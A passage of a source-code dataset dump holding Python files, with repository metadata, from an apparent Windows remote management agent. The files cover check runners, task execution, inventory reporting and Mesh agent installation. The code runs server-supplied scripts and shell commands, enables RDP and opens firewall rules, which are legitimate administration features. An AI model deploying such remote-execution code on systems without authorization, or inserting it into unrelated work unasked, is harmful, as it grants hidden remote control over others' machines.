finish installing, and check if reboot needed\r\n self.trigger_patch_scan()\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n" }, { "alpha_fraction": 0.4782244563102722, "alphanum_fraction": 0.481853723526001, "avg_line_length": 27.887096405029297, "blob_id": "fed6585310073723a1d4935b1d27907c03e33d8e", "content_id": "75a6ebdba2e5ebae676ee134202ac6be6bc38a25", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3582, "license_type": "permissive", "max_line_length": 84, "num_lines": 124, "path": "/winagent/taskrunner.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\nimport json\nimport subprocess\nfrom time import perf_counter\n\nimport requests\n\nfrom agent import WindowsAgent\n\n\nclass TaskRunner(WindowsAgent):\n def __init__(self, task_pk, log_level, log_to):\n super().__init__(log_level, log_to)\n self.task_pk = task_pk\n self.task_url = f\"{self.astor.server}/api/v1/{self.task_pk}/taskrunner/\"\n\n def run(self):\n # called manually and not from within a check\n ret = self.get_task()\n if not ret:\n return False\n\n asyncio.run(self.run_task(ret))\n\n async def run_while_in_event_loop(self):\n # called from inside a check\n ret = self.get_task()\n if not ret:\n return False\n\n await asyncio.gather(self.run_task(ret))\n\n def get_task(self):\n try:\n resp = 
requests.get(\n self.task_url, headers=self.headers, timeout=15, verify=self.verify\n )\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n return resp.json()\n\n async def run_task(self, data):\n try:\n script_path = data[\"script\"][\"filepath\"]\n shell = data[\"script\"][\"shell\"]\n timeout = data[\"timeout\"]\n script_filename = data[\"script\"][\"filename\"]\n args = []\n\n try:\n args = data[\"script_args\"]\n except KeyError:\n pass\n\n cmd = [\n self.salt_call,\n \"win_agent.run_script\",\n f\"filepath={script_path}\",\n f\"filename={script_filename}\",\n f\"shell={shell}\",\n f\"timeout={timeout}\",\n f\"args={args}\",\n ]\n\n self.logger.debug(cmd)\n start = perf_counter()\n\n proc = await asyncio.create_subprocess_exec(\n *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n\n proc_timeout = int(timeout) + 2\n\n try:\n proc_stdout, proc_stderr = await asyncio.wait_for(\n proc.communicate(), proc_timeout\n )\n except asyncio.TimeoutError:\n try:\n proc.terminate()\n except:\n pass\n\n self.logger.debug(f\"Task timed out after {timeout} seconds\")\n proc_stdout, proc_stderr = False, False\n stdout = \"\"\n stderr = f\"Task timed out after {timeout} seconds\"\n retcode = 98\n\n stop = perf_counter()\n\n if proc_stdout:\n resp = json.loads(proc_stdout.decode(\"utf-8\", errors=\"ignore\"))\n retcode = resp[\"local\"][\"retcode\"]\n stdout = resp[\"local\"][\"stdout\"]\n stderr = resp[\"local\"][\"stderr\"]\n\n elif proc_stderr:\n retcode = 99\n stdout = \"\"\n stderr = proc_stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"retcode\": retcode,\n \"execution_time\": \"{:.4f}\".format(stop - start),\n }\n self.logger.debug(payload)\n\n resp = requests.patch(\n self.task_url,\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n\n except Exception as e:\n self.logger.debug(e)\n\n return \"ok\"\n" }, { "alpha_fraction": 0.4376486539840698, "alphanum_fraction": 0.44172611832618713, "avg_line_length": 33.45783233642578, "blob_id": "b504b17153e67ae3ecd3d3a4cceb665a0819f95e", "content_id": "035c5fa5a4d2b2109853386bb12ec9159ec8f56f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2943, "license_type": "permissive", "max_line_length": 84, "num_lines": 83, "path": "/winagent/winagentsvc.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\r\nfrom random import randrange\r\nfrom time import sleep\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass WinAgentSvc(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.hello = f\"{self.astor.server}/api/v2/hello/\"\r\n\r\n def run(self):\r\n self.logger.info(\"Agent service started.\")\r\n try:\r\n info = {\r\n \"agent_id\": self.astor.agentid,\r\n \"hostname\": self.hostname,\r\n \"operating_system\": self.get_os(),\r\n \"total_ram\": self.get_total_ram(),\r\n \"plat\": self.platform,\r\n \"plat_release\": self.get_platform_release(),\r\n \"version\": self.version,\r\n \"antivirus\": self.get_av(),\r\n \"boot_time\": self.get_boot_time(),\r\n }\r\n\r\n salt_ver = self.get_salt_version()\r\n if isinstance(salt_ver, str):\r\n info[\"salt_ver\"] = salt_ver\r\n\r\n self.logger.debug(info)\r\n\r\n r = requests.post(\r\n self.hello,\r\n json.dumps(info),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n except Exception 
as e:\r\n self.logger.debug(e)\r\n\r\n sleep(5)\r\n\r\n while 1:\r\n try:\r\n payload = {\r\n \"agent_id\": self.astor.agentid,\r\n \"local_ip\": self.get_cmd_output([\"ipconfig\", \"/all\"]),\r\n \"services\": self.get_services(),\r\n \"public_ip\": self.get_public_ip(),\r\n \"used_ram\": self.get_used_ram(),\r\n \"disks\": self.get_disks(),\r\n \"logged_in_username\": self.get_logged_on_user(),\r\n \"boot_time\": self.get_boot_time(),\r\n \"version\": self.version,\r\n }\r\n self.logger.debug(payload)\r\n\r\n r = requests.patch(\r\n self.hello,\r\n json.dumps(payload),\r\n headers=self.headers,\r\n timeout=30,\r\n verify=self.verify,\r\n )\r\n\r\n if isinstance(r.json(), dict) and \"recovery\" in r.json().keys():\r\n if r.json()[\"recovery\"] == \"salt\":\r\n self.spawn_detached_process([self.exe, \"-m\", \"recoversalt\"])\r\n elif r.json()[\"recovery\"] == \"mesh\":\r\n self.spawn_detached_process([self.exe, \"-m\", \"recovermesh\"])\r\n elif r.json()[\"recovery\"] == \"command\":\r\n cmd = r.json()[\"cmd\"]\r\n self.spawn_detached_process(cmd, shell=True)\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n finally:\r\n sleep(randrange(start=30, stop=120))\r\n" }, { "alpha_fraction": 0.48143234848976135, "alphanum_fraction": 0.48972147703170776, "avg_line_length": 27.72381019592285, "blob_id": "c42331e0b6db736597d28798d28833f5ffd1f87f", "content_id": "ada799d259fb89cb9367f7b4815909842b76f447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3016, "license_type": "permissive", "max_line_length": 88, "num_lines": 105, "path": "/winagent/mesh.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\nimport sys\nfrom time import sleep\n\nimport psutil\n\nfrom agent import WindowsAgent\nfrom utils import kill_proc, remove_dir\n\n\nclass MeshAgent(WindowsAgent):\n def __init__(self, log_level, log_to):\n super().__init__(log_level, log_to)\n self.mesh_svc = \"mesh agent\"\n self.pf = os.environ[\"ProgramFiles\"]\n\n @property\n def mesh_dir(self):\n dir1 = os.path.join(self.pf, \"Mesh Agent\")\n dir2 = os.path.join(self.pf, \"mesh\\\\Mesh Agent\")\n if os.path.exists(dir1):\n return dir1\n elif os.path.exists(dir2):\n return dir2\n else:\n return None\n\n def remove_mesh(self, exe):\n print(\"Found existing Mesh Agent. 
Removing...\", flush=True)\n try:\n subprocess.run(\n [\"sc\", \"stop\", self.mesh_svc], capture_output=True, timeout=30\n )\n sleep(5)\n except:\n pass\n\n mesh_pids = []\n mesh_procs = [\n p.info\n for p in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in p.info[\"name\"].lower()\n ]\n\n for proc in mesh_procs:\n mesh_pids.append(proc[\"pid\"])\n\n for pid in mesh_pids:\n kill_proc(pid)\n\n try:\n r = subprocess.run([exe, \"-fulluninstall\"], capture_output=True, timeout=60)\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n\n if self.mesh_dir:\n remove_dir(self.mesh_dir)\n\n def install_mesh(self, exe, cmd_timeout):\n attempts = 0\n retries = 5\n\n print(\"Installing mesh agent\", flush=True)\n try:\n ret = subprocess.run(\n [exe, \"-fullinstall\"], capture_output=True, timeout=cmd_timeout\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n return \"error\"\n\n sleep(15)\n while 1:\n try:\n r = subprocess.run([exe, \"-nodeidhex\"], capture_output=True, timeout=30)\n mesh_node_id = r.stdout.decode(\"utf-8\", errors=\"ignore\").strip()\n except Exception as e:\n attempts += 1\n self.logger.error(e)\n self.logger.error(\n f\"Failed to get mesh node id: attempt {attempts} of {retries}\"\n )\n sys.stdout.flush()\n sleep(5)\n else:\n if \"not defined\" in mesh_node_id.lower():\n attempts += 1\n self.logger.error(\n f\"Failed to get mesh node id: attempt {attempts} of {retries}\"\n )\n sys.stdout.flush()\n sleep(5)\n else:\n attempts = 0\n\n if attempts == 0:\n break\n elif attempts >= retries:\n mesh_node_id = \"error\"\n break\n\n return mesh_node_id\n" }, { "alpha_fraction": 0.5692073702812195, "alphanum_fraction": 0.5815446972846985, "avg_line_length": 28.43781089782715, "blob_id": "c6722f6e3f9b4b0a1903a33065c79566884872b6", "content_id": "695177e1018cafcdd88994d925731a50aa12f723", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5917, "license_type": "permissive", "max_line_length": 131, "num_lines": 201, "path": "/winagent/utils.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import ctypes\nimport os\nimport platform\nimport re\nimport signal\nimport subprocess\nimport winreg\nfrom ctypes.wintypes import BYTE, DWORD, WCHAR, WORD\n\nimport psutil\nimport wmi\n\nkernel32 = ctypes.WinDLL(str(\"kernel32\"), use_last_error=True)\n\n\ndef kill_proc(pid):\n try:\n parent = psutil.Process(pid)\n children = parent.children(recursive=True)\n children.append(parent)\n for p in children:\n p.send_signal(signal.SIGTERM)\n\n gone, alive = psutil.wait_procs(children, timeout=20, callback=None)\n except:\n pass\n\n\ndef enable_rdp():\n with winreg.CreateKeyEx(\n winreg.HKEY_LOCAL_MACHINE,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\",\n 0,\n winreg.KEY_ALL_ACCESS,\n ) as key:\n winreg.SetValueEx(key, \"fDenyTSConnections\", 0, winreg.REG_DWORD, 0)\n\n subprocess.run(\n 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes',\n capture_output=True,\n shell=True,\n timeout=15,\n )\n\n\ndef disable_sleep_hibernate():\n with winreg.CreateKeyEx(\n winreg.HKEY_LOCAL_MACHINE,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Power\",\n 0,\n winreg.KEY_ALL_ACCESS,\n ) as key:\n winreg.SetValueEx(key, \"HiberbootEnabled\", 0, winreg.REG_DWORD, 0)\n\n commands = [\n lambda x: f\"powercfg /set{x}valueindex scheme_current sub_buttons lidaction 0\",\n lambda x: f\"powercfg /x -standby-timeout-{x} 0\",\n 
lambda x: f\"powercfg /x -hibernate-timeout-{x} 0\",\n lambda x: f\"powercfg /x -disk-timeout-{x} 0\",\n lambda x: f\"powercfg /x -monitor-timeout-{x} 0\",\n lambda x: f\"powercfg /x -standby-timeout-{x} 0\",\n ]\n\n for x in [\"ac\", \"dc\"]:\n for i in commands:\n subprocess.run(i(x), capture_output=True, shell=True)\n\n subprocess.run(\"powercfg -S SCHEME_CURRENT\", capture_output=True, shell=True)\n\n\ndef enable_ping():\n subprocess.run(\n 'netsh advfirewall firewall add rule name=\"ICMP Allow incoming V4 echo request\" protocol=icmpv4:8,any dir=in action=allow',\n capture_output=True,\n shell=True,\n )\n\n\ndef remove_dir(folder):\n if os.path.exists(folder):\n try:\n os.system('rmdir /S /Q \"{}\"'.format(folder))\n except:\n pass\n\n\ndef bytes2human(n):\n # http://code.activestate.com/recipes/578019\n symbols = (\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\")\n prefix = {}\n for i, s in enumerate(symbols):\n prefix[s] = 1 << (i + 1) * 10\n for s in reversed(symbols):\n if n >= prefix[s]:\n value = float(n) / prefix[s]\n return \"%.1f%s\" % (value, s)\n return \"%sB\" % n\n\n\ndef show_version_info():\n program_dir = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\")\n print(\"Arch\", platform.machine(), flush=True)\n print(\"Program Directory\", program_dir, flush=True)\n ver_file = os.path.join(program_dir, \"VERSION\")\n if os.path.exists(ver_file):\n try:\n with open(ver_file) as f:\n ver = f.read().strip()\n\n print(f\"Agent version: {ver}\", flush=True)\n except Exception as e:\n print(f\"Error getting version: {e}\", flush=True)\n else:\n print(f\"{ver_file} does not exist. Unable to get version\")\n\n\n# source: https://github.com/saltstack/salt/blob/master/salt/grains/core.py\ndef os_version_info_ex():\n class OSVersionInfo(ctypes.Structure):\n _fields_ = (\n (\"dwOSVersionInfoSize\", DWORD),\n (\"dwMajorVersion\", DWORD),\n (\"dwMinorVersion\", DWORD),\n (\"dwBuildNumber\", DWORD),\n (\"dwPlatformId\", DWORD),\n (\"szCSDVersion\", WCHAR * 128),\n )\n\n def __init__(self, *args, **kwds):\n super(OSVersionInfo, self).__init__(*args, **kwds)\n self.dwOSVersionInfoSize = ctypes.sizeof(self)\n kernel32.GetVersionExW(ctypes.byref(self))\n\n class OSVersionInfoEx(OSVersionInfo):\n _fields_ = (\n (\"wServicePackMajor\", WORD),\n (\"wServicePackMinor\", WORD),\n (\"wSuiteMask\", WORD),\n (\"wProductType\", BYTE),\n (\"wReserved\", BYTE),\n )\n\n return OSVersionInfoEx()\n\n\ndef get_os_version_info():\n info = os_version_info_ex()\n c = wmi.WMI()\n c_info = c.Win32_OperatingSystem()[0]\n\n ret = {\n \"MajorVersion\": info.dwMajorVersion,\n \"MinorVersion\": info.dwMinorVersion,\n \"BuildNumber\": info.dwBuildNumber,\n \"PlatformID\": info.dwPlatformId,\n \"ServicePackMajor\": info.wServicePackMajor,\n \"ServicePackMinor\": info.wServicePackMinor,\n \"SuiteMask\": info.wSuiteMask,\n \"ProductType\": info.wProductType,\n \"Caption\": c_info.Caption,\n \"Arch\": c_info.OSArchitecture,\n \"Version\": c_info.Version,\n }\n return ret\n\n\n# source: https://github.com/saltstack/salt/blob/master/salt/grains/core.py\ndef get_windows_os_release_grain(caption, product_type):\n\n version = \"Unknown\"\n release = \"\"\n if \"Server\" in caption:\n for item in caption.split(\" \"):\n\n if re.match(r\"\\d+\", item):\n version = item\n\n if re.match(r\"^R\\d+$\", item):\n release = item\n os_release = f\"{version}Server{release}\"\n else:\n for item in caption.split(\" \"):\n if re.match(r\"^(\\d+(\\.\\d+)?)|Thin|Vista|XP$\", item):\n version = item\n os_release = version\n\n 
if os_release in [\"Unknown\"]:\n os_release = platform.release()\n server = {\n \"Vista\": \"2008Server\",\n \"7\": \"2008ServerR2\",\n \"8\": \"2012Server\",\n \"8.1\": \"2012ServerR2\",\n \"10\": \"2016Server\",\n }\n\n # (Product Type 1 is Desktop, Everything else is Server)\n if product_type > 1 and os_release in server:\n os_release = server[os_release]\n\n return os_release\n" }, { "alpha_fraction": 0.47401416301727295, "alphanum_fraction": 0.48407045006752014, "avg_line_length": 32.623741149902344, "blob_id": "ed95bab11c1f2f63515702e4bb67686123e3b675", "content_id": "7020436910208903303415c23494391a5cb82bce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46737, "license_type": "permissive", "max_line_length": 118, "num_lines": 1390, "path": "/winagent/agent.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\nimport base64\nimport datetime as dt\nimport json\nimport logging\nimport math\nimport os\nimport platform\nimport random\nimport shutil\nimport signal\nimport socket\nimport string\nimport subprocess\nimport sys\nimport zlib\nfrom collections import defaultdict\nfrom time import perf_counter, sleep\n\nimport peewee\nimport psutil\nimport requests\nimport validators\nimport win32con\nimport win32evtlog\nimport win32evtlogutil\nimport winerror\nimport wmi\nfrom playhouse.migrate import SqliteMigrator, migrate\nfrom win32com.client import GetObject\n\nfrom utils import (\n bytes2human,\n get_os_version_info,\n get_windows_os_release_grain,\n kill_proc,\n remove_dir,\n)\n\ndb_path = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\", \"agentdb.db\")\ndb = peewee.SqliteDatabase(db_path)\n\n\nclass AgentStorage(peewee.Model):\n server = peewee.CharField()\n agentid = peewee.CharField()\n mesh_node_id = peewee.CharField()\n token = peewee.CharField()\n agentpk = peewee.IntegerField()\n salt_master = peewee.CharField()\n salt_id = peewee.CharField()\n cert = peewee.CharField(null=True)\n\n class Meta:\n database = db\n\n\nclass WindowsAgent:\n def __init__(self, log_level=\"INFO\", log_to=\"file\"):\n self.log_level = log_level\n self.log_to = log_to\n self.hostname = socket.gethostname()\n self.platform = platform.system().lower()\n self.arch = \"64\" if platform.machine().endswith(\"64\") else \"32\"\n self.programdir = os.path.join(os.environ[\"ProgramFiles\"], \"TacticalAgent\")\n self.exe = os.path.join(self.programdir, \"tacticalrmm.exe\")\n self.system_drive = os.environ[\"SystemDrive\"]\n self.salt_call = os.path.join(self.system_drive, \"\\\\salt\\\\salt-call.bat\")\n self.verify = None\n self.version = self.get_agent_version()\n self.setup_logging()\n self.load_db()\n\n @property\n def salt_minion_exe(self):\n if self.arch == \"64\":\n return \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup.exe\"\n else:\n return \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup-x86.exe\"\n\n @property\n def salt_installer(self):\n if self.arch == \"64\":\n return \"salt-minion-setup.exe\"\n else:\n return \"salt-minion-setup-x86.exe\"\n\n @property\n def mesh_installer(self):\n if self.arch == \"64\":\n return \"meshagent.exe\"\n else:\n return \"meshagent-x86.exe\"\n\n @property\n def nssm(self):\n if self.arch == \"64\":\n return os.path.join(self.programdir, \"nssm.exe\")\n else:\n return os.path.join(self.programdir, \"nssm-x86.exe\")\n\n def load_db(self):\n if os.path.exists(db_path):\n try:\n self.astor = self.get_db()\n 
self.verify = self.astor.cert\n except:\n self.logger.info(\"Migrating DB\")\n cert = peewee.CharField(null=True)\n migrator = SqliteMigrator(db)\n migrate(migrator.add_column(\"agentstorage\", \"cert\", cert))\n self.load_db()\n return\n\n self.headers = {\n \"content-type\": \"application/json\",\n \"Authorization\": f\"Token {self.astor.token}\",\n }\n\n def get_agent_version(self):\n try:\n with open(os.path.join(self.programdir, \"VERSION\")) as f:\n ver = f.read().strip()\n\n return ver\n except:\n return \"0.0.1\"\n\n def setup_logging(self):\n if self.log_to == \"stdout\":\n handler = logging.StreamHandler(sys.stdout)\n else:\n handler = logging.FileHandler(os.path.join(self.programdir, \"winagent.log\"))\n\n logging.basicConfig(\n level=logging.getLevelName(self.log_level),\n format=\"%(asctime)s - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s\",\n handlers=[handler],\n )\n self.logger = logging.getLogger(__name__)\n\n async def script_check(self, data):\n try:\n script_path = data[\"script\"][\"filepath\"]\n shell = data[\"script\"][\"shell\"]\n timeout = data[\"timeout\"]\n script_filename = data[\"script\"][\"filename\"]\n args = []\n\n try:\n args = data[\"script_args\"]\n except KeyError:\n pass\n\n cmd = [\n self.salt_call,\n \"win_agent.run_script\",\n f\"filepath={script_path}\",\n f\"filename={script_filename}\",\n f\"shell={shell}\",\n f\"timeout={timeout}\",\n f\"args={args}\",\n ]\n\n self.logger.debug(cmd)\n start = perf_counter()\n\n proc = await asyncio.create_subprocess_exec(\n *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n\n proc_timeout = int(timeout) + 2\n\n try:\n proc_stdout, proc_stderr = await asyncio.wait_for(\n proc.communicate(), proc_timeout\n )\n except asyncio.TimeoutError:\n try:\n proc.terminate()\n except:\n pass\n\n self.logger.debug(f\"Script check timed out after {timeout} seconds\")\n proc_stdout, proc_stderr = False, False\n stdout = \"\"\n stderr = f\"Script timed out after {timeout} seconds\"\n retcode = 98\n\n stop = perf_counter()\n\n if proc_stdout:\n resp = json.loads(proc_stdout.decode(\"utf-8\", errors=\"ignore\"))\n retcode = resp[\"local\"][\"retcode\"]\n stdout = resp[\"local\"][\"stdout\"]\n stderr = resp[\"local\"][\"stderr\"]\n\n elif proc_stderr:\n retcode = 99\n stdout = \"\"\n stderr = proc_stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"id\": data[\"id\"],\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"retcode\": retcode,\n \"stop\": stop,\n \"start\": start,\n }\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def ping_check(self, data):\n try:\n cmd = [\"ping\", data[\"ip\"]]\n r = await asyncio.create_subprocess_exec(\n *cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n\n stdout, stderr = await r.communicate()\n\n has_stdout, has_stderr = False, False\n\n if stdout:\n has_stdout = True\n output = stdout.decode(\"utf-8\", 
errors=\"ignore\")\n elif stderr:\n has_stderr = True\n output = stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"id\": data[\"id\"],\n \"has_stdout\": has_stdout,\n \"has_stderr\": has_stderr,\n \"output\": output,\n }\n\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def disk_check(self, data, exists=True):\n try:\n disk = psutil.disk_usage(data[\"disk\"])\n except Exception:\n exists = False\n self.logger.error(f\"Disk {data['disk']} does not exist\")\n\n if exists:\n payload = {\n \"id\": data[\"id\"],\n \"percent_used\": disk.percent,\n \"total\": disk.total,\n \"free\": disk.free,\n \"exists\": exists,\n }\n else:\n payload = {\"id\": data[\"id\"], \"exists\": False}\n\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n async def cpu_load_check(self, data, interval=7):\n try:\n interval = int(data[\"interval\"])\n except:\n pass\n\n try:\n psutil.cpu_percent(interval=0)\n await asyncio.sleep(interval)\n cpu_load = round(psutil.cpu_percent(interval=0))\n\n payload = {\"percent\": cpu_load, \"id\": data[\"id\"]}\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return False\n\n async def mem_check(self, data):\n try:\n payload = {\"percent\": self.get_used_ram(), \"id\": data[\"id\"]}\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n 
log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return False\n\n async def win_service_check(self, data, exists=True):\n try:\n try:\n service = psutil.win_service_get(data[\"svc_name\"])\n except psutil.NoSuchProcess:\n exists = False\n self.logger.error(f\"Service {data['svc_name']} does not exist\")\n\n payload = {\n \"id\": data[\"id\"],\n \"status\": service.status() if exists else \"n/a\",\n \"exists\": exists,\n }\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=70,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def event_log_check(self, data):\n try:\n log = []\n\n api_log_name = data[\"log_name\"]\n api_search_last_days = int(data[\"search_last_days\"])\n\n if api_search_last_days != 0:\n start_time = dt.datetime.now() - dt.timedelta(days=api_search_last_days)\n\n flags = (\n win32evtlog.EVENTLOG_BACKWARDS_READ\n | win32evtlog.EVENTLOG_SEQUENTIAL_READ\n )\n\n status_dict = {\n win32con.EVENTLOG_AUDIT_FAILURE: \"AUDIT_FAILURE\",\n win32con.EVENTLOG_AUDIT_SUCCESS: \"AUDIT_SUCCESS\",\n win32con.EVENTLOG_INFORMATION_TYPE: \"INFO\",\n win32con.EVENTLOG_WARNING_TYPE: \"WARNING\",\n win32con.EVENTLOG_ERROR_TYPE: \"ERROR\",\n 0: \"INFO\",\n }\n\n hand = win32evtlog.OpenEventLog(\"localhost\", api_log_name)\n total = win32evtlog.GetNumberOfEventLogRecords(hand)\n uid = 0\n done = False\n\n while 1:\n\n events = win32evtlog.ReadEventLog(hand, flags, 0)\n for ev_obj in events:\n\n uid += 1\n # return once total number of events reach or we'll be stuck in an infinite loop\n if uid >= total:\n done = True\n break\n\n the_time = ev_obj.TimeGenerated.Format()\n time_obj = dt.datetime.strptime(the_time, \"%c\")\n\n if api_search_last_days != 0:\n if time_obj < start_time:\n done = True\n break\n\n computer = str(ev_obj.ComputerName)\n src = str(ev_obj.SourceName)\n evt_type = str(status_dict[ev_obj.EventType])\n evt_id = str(winerror.HRESULT_CODE(ev_obj.EventID))\n evt_category = str(ev_obj.EventCategory)\n record = str(ev_obj.RecordNumber)\n msg = (\n str(win32evtlogutil.SafeFormatMessage(ev_obj, api_log_name))\n .replace(\"<\", \"\")\n .replace(\">\", \"\")\n )\n\n event_dict = {\n \"computer\": computer,\n \"source\": src,\n \"eventType\": evt_type,\n \"eventID\": evt_id,\n \"eventCategory\": evt_category,\n \"message\": msg,\n \"time\": the_time,\n \"record\": record,\n \"uid\": uid,\n }\n log.append(event_dict)\n\n if done:\n break\n\n win32evtlog.CloseEventLog(hand)\n payload = {\"id\": data[\"id\"], \"log\": self._compress_json(log)}\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=45,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from 
taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n def get_db(self):\n with db:\n astor = AgentStorage.select()[0]\n\n return astor\n\n def get_boot_time(self):\n return psutil.boot_time()\n\n def get_used_ram(self):\n return round(psutil.virtual_memory().percent)\n\n def get_services(self):\n # see https://github.com/wh1te909/tacticalrmm/issues/38\n # for why I am manually implementing the svc.as_dict() method of psutil\n ret = []\n for svc in psutil.win_service_iter():\n i = {}\n try:\n i[\"display_name\"] = svc.display_name()\n i[\"binpath\"] = svc.binpath()\n i[\"username\"] = svc.username()\n i[\"start_type\"] = svc.start_type()\n i[\"status\"] = svc.status()\n i[\"pid\"] = svc.pid()\n i[\"name\"] = svc.name()\n i[\"description\"] = svc.description()\n except Exception:\n continue\n else:\n ret.append(i)\n\n return 